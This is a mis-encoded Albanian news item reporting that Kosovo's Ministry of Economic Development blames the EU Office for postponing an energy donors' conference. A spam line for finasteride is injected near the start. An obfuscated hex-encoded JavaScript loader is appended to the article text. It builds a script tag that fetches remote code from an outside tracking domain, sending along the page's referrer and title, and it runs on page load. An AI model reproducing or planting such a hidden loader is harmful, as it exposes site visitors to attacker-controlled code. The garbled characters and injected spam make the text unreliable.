f1_15mzhe1352971036

MZHE-ja: Konferenca (donatore) A�shtA� shtyrA� pA�r fajin e ZyrA�s sA� BE-sA�

buy la india finasteride 1mg. Ministria e Zhvillimit Ekonomik e ka bA�rA� fajtore ZyrA�n e Bashkimit Evropian nA� KosovA� pA�r mosmbajtjen e KonferencA�s sA� DonatorA�ve nA� muajin nA�ntor.

Kjo ministri i quan tA� pavA�rteta informacionet e dhA�na nga Zyra e BE-sA� nA� KosovA�. NA�pA�rmjet njA� reagimi, ministria e drejtuar Besim Beqaj ka thA�nA� se Konferenca e DonatorA�ve e planifikuar tA� mbahej nA� nA�ntor A�shtA� shtyrA� pA�r pranverA�, pasi Zyra e BE-sA� nuk ka qenA� e pA�rgatitur teknikisht pA�r mbajtjen e konferencA�s.

a�?MZHE-ja A�shtA� e befasuar me deklaratA�n e zyrtares pA�r komunikim tA� ZyrA�s sA� BE-sA�, pasi qA� ata vetA� nuk ishin tA� gatshA�m dhe tA� pA�rgatitur teknikisht pA�r mbajtjen e konferencA�s gjatA� kA�tij vitia�?, thuhet nA� reagimin e MinistrisA� sA� Zhvillimit Ekonomik.

NA� reagimin e kA�saj ministrie thuhet se A�shtA� i pavA�rtetA� edhe informacioni se konferenca A�shtA� shtyrA� pA�r shkak se Bashkimi Evropian e Banka BotA�rore nuk kanA� marrA� garancitA� e pritura nga Qeveria e KosovA�s.

a�?JanA� dhA�nA� informacione tA� pavA�rteta se kinse BB-ja dhe BE-ja nuk i kanA� marrA� garancitA� e pritura nga Qeveria e RepublikA�s sA� KosovA�s dhe se kjo ishte arsyeja pse nuk do tA� mbahet konferenca e donatorA�ve nga lA�mi i energjisA� nA� nA�ntor, siA� ishte e planifikuara�?, thuhet ndA�r tA� tjera nA� kA�tA� reagim qA� e boton Koha Ditore.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}